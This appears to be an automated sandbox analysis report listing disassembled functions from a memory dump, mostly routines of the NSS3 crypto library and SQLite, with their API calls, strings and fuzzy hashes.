Instruction ID: 8612ea26ec92815aa88e2bf40e9117e24bbc8ffc65210eaf6d86fca07bc4858f
Opcode Fuzzy Hash: 8ed74df995b9505b982a0549f9d737b15d53fe2b27b24695b1540a075585082a
Instruction Fuzzy Hash: AA616A71A002149BD330CF29C940BA6B7F6EF95318F1885ADE4499FB42D376E947C7A1

Function 6C7D4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C7D536F,00000022,?,?,00000000,?), ref: 6C7D4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C7D4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C7D4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C7D4FAE
free.MOZGLUE(?), ref: 6C7D4FC8

Strings

%s=%s, xrefs: 6C7D4F89
%s=%c%s%c, xrefs: 6C7D4FA9
oS}l", xrefs: 6C7D4DFB, 6C7D4EF4, 6C7D4EC5

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oS}l"
API String ID: 2709355791-2082417239
Opcode ID: 1708a27c433e4ffd1b9bf3772f7a60c1dfe36fca9905f5aa5e7361a670198eec
Instruction ID: 4c075b2ee2c6c030f809ccb0de39babeef9d102d3f3a05f5ac963ebc35c73851
Opcode Fuzzy Hash: 1708a27c433e4ffd1b9bf3772f7a60c1dfe36fca9905f5aa5e7361a670198eec
Instruction Fuzzy Hash: 3D515971A04146ABEF01CB69C6907FF7BF99F42308F1E8136E894A7A41D325A8059792

Function 6C7FEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FEF6D

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

htonl.WSOCK32(00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FEFE4
htonl.WSOCK32(?,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FEFF1
memcpy.VCRUNTIME140(?,?,6C81A4A1,?,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FF00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FF027

Strings

dtls13, xrefs: 6C7FEF33

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: eb107c6c2fcd318995edff95dfa7555f3a6df9f61ad2ab2da428ae857d14265e
Instruction ID: 9df5b4555425a5dcc8939ababdb9b03bcbe838fc916e1e6a3c10734e1f948f38
Opcode Fuzzy Hash: eb107c6c2fcd318995edff95dfa7555f3a6df9f61ad2ab2da428ae857d14265e
Instruction Fuzzy Hash: 58310671A01215AFD710DF28DE80B9AB7E4EF49348F158439E8289B751E731E916CBE1

Function 6C77AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C77AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C899500,6C773F91), ref: 6C77AFD2

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

DER_GetInteger_Util.NSS3(?), ref: 6C77B007

Part of subcall function 6C7C6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C771666,?,6C77B00C,?), ref: 6C7C6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C77B02F
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C77B046
PL_FreeArenaPool.NSS3 ref: 6C77B058
PL_FinishArenaPool.NSS3 ref: 6C77B060

Strings

security, xrefs: 6C77AFB8

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: b004f437ae6a2d62fed60de5a2c0eebe1b1b280373cf6219796c2ad56377a6a8
Instruction ID: 238b97ef3bb303d8200b70d86b543278bf3127edb217e8dd7074b7bf8587aaa5
Opcode Fuzzy Hash: b004f437ae6a2d62fed60de5a2c0eebe1b1b280373cf6219796c2ad56377a6a8
Instruction Fuzzy Hash: 4D313A705043049BDF308F149E4CBAA77A4AF4632CF100A68E8759BBC1E332A609C7A7

Function 6C7A2BF0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismInfo), ref: 6C7A2C0C
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C7A2C27

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

PR_LogPrint.NSS3( type = 0x%x,?), ref: 6C7A2C40

Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880B88
Part of subcall function 6C8809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C880C5D
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C880C8D
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880C9C
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880CD1
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880CEC
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880CFB
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880D16
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C880D26
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D35
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C880D65
Part of subcall function 6C8809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C880D70
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880D90
Part of subcall function 6C8809D0: free.MOZGLUE(00000000), ref: 6C880D99

PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C7A2C59

Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880BAB
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880BBA
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D7E

Strings

pInfo = 0x%p, xrefs: 6C7A2C54
slotID = 0x%x, xrefs: 6C7A2C22
type = 0x%x, xrefs: 6C7A2C3B
C_GetMechanismInfo, xrefs: 6C7A2C07

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DebugOutputStringfflush$Printfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: pInfo = 0x%p$ slotID = 0x%x$ type = 0x%x$C_GetMechanismInfo
API String ID: 2688868551-112346095
Opcode ID: 1a86210e7bb21f949ed3052300d3042f640a8af84065f956a72d4f8336f02dba
Instruction ID: b43b4c715abc3b551c4380bfd21a74e51f620d3ebcd91287c13d173384c32cae
Opcode Fuzzy Hash: 1a86210e7bb21f949ed3052300d3042f640a8af84065f956a72d4f8336f02dba
Instruction Fuzzy Hash: 8B21A175202144BFDB209B95DF8CA557B75EB8632EF048535E808D7B12D734BC49CB91

Function 6C7BCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C7BCD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C7BCE16
PR_SetError.NSS3(00000000,00000000), ref: 6C7BD079

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 00d869b5061ca9b2ac6766d60c915f68d813d172a10e0d3eb9f0be496ff92662
Instruction ID: ae664c8bb7a760bb95369826bac31f384a73ad3332623e64857179559dfb8aaf
Opcode Fuzzy Hash: 00d869b5061ca9b2ac6766d60c915f68d813d172a10e0d3eb9f0be496ff92662
Instruction Fuzzy Hash: F8C18DB5A002199FDB20CF24CD85BDAB7B4BF48318F1481A8E948A7741E775EE95CF90

Function 6C772C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(731E398C), ref: 6C772C5D

Part of subcall function 6C7D0D30: calloc.MOZGLUE ref: 6C7D0D50
Part of subcall function 6C7D0D30: TlsGetValue.KERNEL32 ref: 6C7D0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C772C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C772CE0

Part of subcall function 6C772E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C772CDA,?,00000000), ref: 6C772E1E
Part of subcall function 6C772E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C772E33
Part of subcall function 6C772E00: TlsGetValue.KERNEL32 ref: 6C772E4E
Part of subcall function 6C772E00: EnterCriticalSection.KERNEL32(?), ref: 6C772E5E
Part of subcall function 6C772E00: PL_HashTableLookup.NSS3(?), ref: 6C772E71
Part of subcall function 6C772E00: PL_HashTableRemove.NSS3(?), ref: 6C772E84
Part of subcall function 6C772E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C772E96
Part of subcall function 6C772E00: PR_Unlock.NSS3 ref: 6C772EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C772D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C772D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C772D3F
free.MOZGLUE(00000000), ref: 6C772D73
CERT_DestroyCertificate.NSS3(?), ref: 6C772DB8
free.MOZGLUE ref: 6C772DC8

Part of subcall function 6C773E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C773EC2
Part of subcall function 6C773E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C773ED6
Part of subcall function 6C773E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C773EEE
Part of subcall function 6C773E60: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C773F02
Part of subcall function 6C773E60: PL_FreeArenaPool.NSS3 ref: 6C773F14
Part of subcall function 6C773E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C773F27

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: c36c021531d7af97ebffe897e6f3a4cc4012e90828de995afd3167026f36e81a
Instruction ID: cdc0e03a429952cc83e0fecc831cab13dc491632f540fd8492627873f48fb8fe
Opcode Fuzzy Hash: c36c021531d7af97ebffe897e6f3a4cc4012e90828de995afd3167026f36e81a
Instruction Fuzzy Hash: 5F51D071A04219DBDF209F29CE4AB6B77E5EF94308F140438EC6583650E731E815CBA2

Function 6C798F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C799013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C799042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C79905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C799073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C7990EC

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C799111

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: 9b3f4165ac404acdeaebde3b18a639ad97565ea33329adf2efc9118802add079
Instruction ID: a0071b91769593d7f384c70c3dc261745d0621799e88d77ec053b4499a0570e2
Opcode Fuzzy Hash: 9b3f4165ac404acdeaebde3b18a639ad97565ea33329adf2efc9118802add079
Instruction Fuzzy Hash: 79518974A046158FDF10EF38D688299BBF1BF4A318F055579DC499BB06EB35E884CB81

Function 6C778980 Relevance: 13.6, APIs: 9, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C777310), ref: 6C7789B8

Part of subcall function 6C7D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D1228
Part of subcall function 6C7D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7D1238
Part of subcall function 6C7D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D124B
Part of subcall function 6C7D1200: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D125D
Part of subcall function 6C7D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7D126F
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7D1280
Part of subcall function 6C7D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7D128E
Part of subcall function 6C7D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7D129A
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7D12A1

PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C777310), ref: 6C7789E6
PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C778A00
CERT_CopyRDN.NSS3(00000004,00000000,6C777310,?,?,00000004,?), ref: 6C778A1B
PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C778A74
PR_SetError.NSS3(FFFFE005,00000000,00000000,?,00000028,?,?,6C777310), ref: 6C778AAF
PORT_ArenaAlloc_Util.NSS3(00000004,00000008,00000000,?,00000028,?,?,6C777310), ref: 6C778AF3
PORT_ArenaGrow_Util.NSS3(00000004,?,C8850FC0,00000000,00000000,?,00000028,?,?,6C777310), ref: 6C778B1D

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_$CriticalFreeGrow_PoolSectionfree$Arena_CallClearCopyDeleteEnterErrorOnceUnlockValue
String ID:
API String ID: 3791662518-0
Opcode ID: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction ID: b98a9cce48748e5208d63f68d67564c75459bc33680b5d4684d1cd7d8352aef3
Opcode Fuzzy Hash: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction Fuzzy Hash: 2E51D771601314AFEF208F54CE44B6A77A4FF4271CF16816ADC15ABB91E731E905CBA1

Function 6C7E0B00 Relevance: 13.6, APIs: 9, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7E0B21

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

Part of subcall function 6C7B8500: SECOID_GetAlgorithmTag_Util.NSS3(6C7B95DC,00000000,00000000,00000000,?,6C7B95DC,00000000,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B8517

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7E0B64

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7E0B72
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C7E0BA1
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C7E0BB1
PK11_CreateContextBySymKey.NSS3(-00000001,00000105,?,?), ref: 6C7E0BF3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7E0C00

Part of subcall function 6C7B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B95E0
Part of subcall function 6C7B95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B95F5
Part of subcall function 6C7B95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C7B9609
Part of subcall function 6C7B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B961D
Part of subcall function 6C7B95C0: PK11_GetInternalSlot.NSS3 ref: 6C7B970B
Part of subcall function 6C7B95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C7B9756
Part of subcall function 6C7B95C0: PK11_GetIVLength.NSS3(?), ref: 6C7B9767
Part of subcall function 6C7B95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C7B977E
Part of subcall function 6C7B95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B978E

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E0C29

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$K11_Tag_$Item_$FindZfree$Algorithm$Length$Alloc_BlockContextCreateFreeInternalSizeSlotfree
String ID:
API String ID: 2322824727-0
Opcode ID: 00c60ef354a4af96c65d78435c3e49632f3ad353a5366e36e01f55bfa816829c
Instruction ID: 613b34bf5f1e8098f0c6afed0c365aaac50482d1b2e1acd1db20425ec318da0a
Opcode Fuzzy Hash: 00c60ef354a4af96c65d78435c3e49632f3ad353a5366e36e01f55bfa816829c
Instruction Fuzzy Hash: 9431B6B69002455BE7109B25EE49BAB76B8AF0835CF040535E81A9B752FB35E908C7E2

Function 6C70E890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C70E922
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C70E9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C70EA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C70EB20
memcpy.VCRUNTIME140(?,?,?), ref: 6C70EB57

Strings

foreign key on %s should reference only one column of table %T, xrefs: 6C70EE04
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C70EDC2
unknown column "%s" in foreign key definition, xrefs: 6C70ED18

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
